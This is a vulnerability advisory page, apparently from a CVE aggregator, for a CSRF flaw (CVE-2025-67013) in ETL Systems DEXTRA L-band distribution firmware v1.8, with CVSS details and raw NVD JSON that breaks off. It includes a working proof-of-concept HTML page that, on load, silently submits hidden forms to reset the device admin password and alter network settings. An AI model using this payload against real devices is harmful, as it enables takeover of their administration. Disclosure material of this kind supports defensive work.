Security Vulnerability Report
中文
CVE-2025-67013 CVSS 6.5 MEDIUM

CVE-2025-67013

Published: 2025-12-26 16:15:44
Last Modified: 2026-01-02 16:10:39
Source: [email protected]

Description

The web management interface in ETL Systems Ltd DEXTRA Series ' Digital L-Band Distribution System v1.8 does not implement Cross-Site Request Forgery (CSRF) protection mechanisms (no tokens, no Origin/Referer validation) on critical configuration endpoints.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:etlsystems:d0116s1ula-22454_firmware:1.8:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:etlsystems:d0116s1ula-22454:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:etlsystems:d0116s1uia-22474_firmware:1.8:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:etlsystems:d0116s1uia-22474:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:etlsystems:c0401s1ula-22418_firmware:1.8:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:etlsystems:c0401s1ula-22418:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:etlsystems:c0801s1ula-22420_firmware:1.8:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:etlsystems:c0801s1ula-22420:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:etlsystems:c1601s1ula-22422_firmware:1.8:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:etlsystems:c1601s1ula-22422:-:*:*:*:*:*:*:* - NOT VULNERABLE
ETL Systems DEXTRA Series Digital L-Band Distribution System v1.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-67013 --> <!-- Target: ETL Systems DEXTRA Series Digital L-Band Distribution System v1.8 --> <!DOCTYPE html> <html> <head> <title>CSRF PoC - Change Admin Password</title> </head> <body> <h1>CVE-2025-67013 CSRF PoC</h1> <p>This PoC demonstrates CSRF vulnerability in ETL Systems DEXTRA Series.</p> <form id="csrfForm" action="http://TARGET_IP/admin/settings" method="POST" style="display:none;"> <!-- Change admin password --> <input type="hidden" name="action" value="update_admin"> <input type="hidden" name="username" value="admin"> <input type="hidden" name="password" value="AttackerPassword123"> <input type="hidden" name="confirm_password" value="AttackerPassword123"> </form> <form id="networkForm" action="http://TARGET_IP/admin/network" method="POST" style="display:none;"> <!-- Modify network configuration --> <input type="hidden" name="action" value="save_network"> <input type="hidden" name="ip_address" value="192.168.1.100"> <input type="hidden" name="subnet_mask" value="255.255.255.0"> <input type="hidden" name="gateway" value="192.168.1.1"> </form> <script> // Auto-submit forms when page loads window.onload = function() { // Submit admin password change request document.getElementById('csrfForm').submit(); // Alternatively submit network config change // setTimeout(() => { document.getElementById('networkForm').submit(); }, 1000); }; </script> <p>If you see this message, the forms were submitted.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67013", "sourceIdentifier": "[email protected]", "published": "2025-12-26T16:15:44.367", "lastModified": "2026-01-02T16:10:39.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The web management interface in ETL Systems Ltd DEXTRA Series ' Digital L-Band Distribution System v1.8 does not implement Cross-Site Request Forgery (CSRF) protection mechanisms (no tokens, no Origin/Referer validation) on critical configuration endpoints."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:etlsystems:d0116s1ula-22454_firmware:1.8:*:*:*:*:*:*:*", "matchCriteriaId": "9A956563-B69E-4D24-A05D-A9F81374234C"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:etlsystems:d0116s1ula-22454:-:*:*:*:*:*:*:*", "matchCriteriaId": "D389841E-9F56-4547-8A3F-C6558F478605"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:etlsystems:d0116s1uia-22474_firmware:1.8:*:*:*:*:*:*:*", "matchCriteriaId": "7B38C657-791F-4857-B6BB-B561FF3DF2C3"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:etlsystems:d0116s1uia-22474:-:*:*:*:*:*:*:*", "matchCriteriaId": "C58A3924-12E1-41BF-8503-D944157B0486"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:etlsystems:c0401s1ula-22418_firmware:1.8:*:*:*:*:*:*:*", "matchCriteriaId": "4E266D8F-7A51-4E76-88A6-D0F8CC35353D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:etlsystems:c0401s1ula-22418:-:*:*:*:*:*:*:*", "matchCriteriaId": "6CD95334-9D68-482E-84EF-2C7F4BAC095D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:etlsystems:c0801s1ula-22420_firmware:1.8:*:*:*:*:*:*:*", "matchCriteriaId": "CF8601E5-B0D3-42E8-A1BF-5AAB2F2603B1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:etlsystems:c0801s1ula-22420:-:*:*:*:*:*:*:*", "matchCriteriaId": "599A9F22-4792-451F-BC8B-9C8F317D37CC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:etlsystems:c1601s1ula-22422_firmware:1.8:*:*:*:*:*:*:*", "matchCriteriaId": "023BD34A-4E84-4372-8948-A662E2B3311B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:etlsystems:c1601s1ula-22422:-:*:*:*:*:*:*:*", "matchCriteriaId": "9CA2E82A-9A88-4447-B44B-9A64BEF03995"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:etlsystems:c0401s1ula-22455_firmware:1.8:*:*:*:*:*:*:*", "matchCriteriaId": "3EFD655E-A0AF-4556-AC5F-6FD81DF1F9C3"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:etlsystems:c0401s1ula-22455:-:*:*:*:*:*:*:*", "matchCriteriaId": "0F272578-4821-499F-9465-9DADCFF18788"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:etlsystems:c0801s1ula-22457_firmware:1.8:*:*:*:*:*:*:*", "matchCriteriaId": "6065A81E-8311-47EE-9E59-BF0A552D8CD0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:etlsystems:c0801s1ula-22457:-:*:*:*:*:*:*:*", "matchCriteriaId": "35A00256-4B59-4DBF-99DA-CC8236E513C5"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:etlsystems:c1601s1ula-22459_firmware:1.8:*:*:*:*:*:*:*", "matchCriteriaId": "5815AB76-D420-46EE-BB39-A4E81CB34E2A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:etlsystems:c1601s1ula-22459:-:*:*:*:*:*:*:*", "matchCriteriaId": "FEF88591-638A-4121-A025-565D132E77C9"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:etlsystems:c1601s1uia-22479_firmware:1.8:*:*:*:*:*:*:*", "matchCriteriaId": "1A779FE0-C09A-411C-9D29-94435CBE71D8"}]}, {"operator": "OR" ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.